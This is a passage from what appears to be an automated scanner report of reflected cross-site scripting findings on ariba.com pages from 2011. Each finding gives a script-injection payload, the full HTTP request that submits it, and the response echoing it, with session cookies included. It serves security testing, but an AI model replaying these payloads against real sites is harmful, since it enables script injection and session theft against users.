<a href="http://nordics.ariba.com/404.cfm?pageLocation=40418239--><script>alert(1)</script>081c7f68b1c&l=dm" title="D&#228;nemark">
...[SNIP]...

1.42. http://www.ariba.com/404.cfm [pageLocation parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /404.cfm

Issue detail

The value of the pageLocation request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e124e"><script>alert(1)</script>354d4e60877 was submitted in the pageLocation parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /404.cfm?pageLocation=404e124e"><script>alert(1)</script>354d4e60877 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=621; s_cc=true; gpv_pn=%2Findex.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.19.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=36; ALPersonId=13N33417

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:17:56 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=821;expires=Wed, 17-Oct-2012 18:17:56 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/404.cfm?pageLocation=404e124e"><script>alert(1)</script>354d4e60877&l=dm" title="Denmark">
...[SNIP]...

1.43. http://www.ariba.com/contact.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /contact.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a655f--><script>alert(1)</script>0dc3e6f4beb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /contact.cfm?a655f--><script>alert(1)</script>0dc3e6f4beb=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/404.cfm?pageLocation=404
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; ALPersonId=13N33417; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=623; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.21.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=100; gpv_pn=%2F404.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252F404.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fcontact.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:18:17 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=885;expires=Wed, 17-Oct-2012 18:18:17 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/contact.cfm?a655f--><script>alert(1)</script>0dc3e6f4beb=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.44. http://www.ariba.com/contact.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /contact.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dab2"><script>alert(1)</script>14911a9ec02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.cfm?2dab2"><script>alert(1)</script>14911a9ec02=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/404.cfm?pageLocation=404
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; ALPersonId=13N33417; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=623; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.21.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=100; gpv_pn=%2F404.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252F404.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fcontact.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:18:13 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=878;expires=Wed, 17-Oct-2012 18:18:13 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/contact.cfm?2dab2"><script>alert(1)</script>14911a9ec02=1&l=dm" title="Denmark">
...[SNIP]...

1.45. http://www.ariba.com/legal/en_webtrust.cfm [7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /legal/en_webtrust.cfm

Issue detail

The value of the 7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f8e3"><script>alert(1)</script>92572bbccc0 was submitted in the 7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=14f8e3"><script>alert(1)</script>92572bbccc0 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; gpv_pn=%2Froles%2Fit.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.11.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=38; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=26

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:05:40 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=391;expires=Wed, 17-Oct-2012 18:05:40 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=14f8e3"><script>alert(1)</script>92572bbccc0&l=dm" title="Denmark">
...[SNIP]...

1.46. http://www.ariba.com/legal/en_webtrust.cfm [7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /legal/en_webtrust.cfm

Issue detail

The value of the 7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 request parameter is copied into an HTML comment. The payload 4483a--><script>alert(1)</script>e950b37fe07 was submitted in the 7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=14483a--><script>alert(1)</script>e950b37fe07 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; gpv_pn=%2Froles%2Fit.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.11.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=38; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=26

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:05:43 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=394;expires=Wed, 17-Oct-2012 18:05:43 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=14483a--><script>alert(1)</script>e950b37fe07&l=dm" title="D&#228;nemark">
...[SNIP]...

1.47. http://www.ariba.com/legal/en_webtrust.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /legal/en_webtrust.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e2e6"><script>alert(1)</script>ee10b37ba61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /legal/en_webtrust.cfm?7e2e6"><script>alert(1)</script>ee10b37ba61=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; LANGUAGEID=en

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:02:10 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=26;expires=Wed, 17-Oct-2012 18:02:10 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/legal/en_webtrust.cfm?7e2e6"><script>alert(1)</script>ee10b37ba61=1&l=dm" title="Denmark">
...[SNIP]...

1.48. http://www.ariba.com/legal/en_webtrust.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /legal/en_webtrust.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ac553--><script>alert(1)</script>6aedde591de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /legal/en_webtrust.cfm?ac553--><script>alert(1)</script>6aedde591de=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; LANGUAGEID=en

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:02:14 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=36;expires=Wed, 17-Oct-2012 18:02:14 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/legal/en_webtrust.cfm?ac553--><script>alert(1)</script>6aedde591de=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.49. http://www.ariba.com/roles/it.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /roles/it.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e864"><script>alert(1)</script>4a0c0970880 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /roles/it.cfm?4e864"><script>alert(1)</script>4a0c0970880=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; s_ppv=100; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.7.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=125; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Froles%25252Fit.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:05:15 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=350;expires=Wed, 17-Oct-2012 18:05:15 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/roles/it.cfm?4e864"><script>alert(1)</script>4a0c0970880=1&l=dm" title="Denmark">
...[SNIP]...

1.50. http://www.ariba.com/roles/it.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /roles/it.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 99487--><script>alert(1)</script>6b84c1d7b2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /roles/it.cfm?99487--><script>alert(1)</script>6b84c1d7b2d=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; s_ppv=100; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.7.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=125; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Froles%25252Fit.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:05:19 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=366;expires=Wed, 17-Oct-2012 18:05:19 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/roles/it.cfm?99487--><script>alert(1)</script>6b84c1d7b2d=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.51. http://www.ariba.com/services/support.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /services/support.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dbac"><script>alert(1)</script>03affe20636 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/support.cfm?5dbac"><script>alert(1)</script>03affe20636=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=293; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.13.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=60; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fsupport%25252Fsupport_services.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:07:28 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=558;expires=Wed, 17-Oct-2012 18:07:28 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Ariba Customer Support - Technical Support</
...[SNIP]...
<a href="http://nordics.ariba.com/services/support.cfm?5dbac"><script>alert(1)</script>03affe20636=1&l=dm" title="Denmark">
...[SNIP]...

1.52. http://www.ariba.com/services/support.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /services/support.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b09fb--><script>alert(1)</script>335291e69b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/support.cfm?b09fb--><script>alert(1)</script>335291e69b=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=293; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.13.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=60; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fsupport%25252Fsupport_services.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:07:34 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=579;expires=Wed, 17-Oct-2012 18:07:34 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Ariba Customer Support - Technical Support</
...[SNIP]...
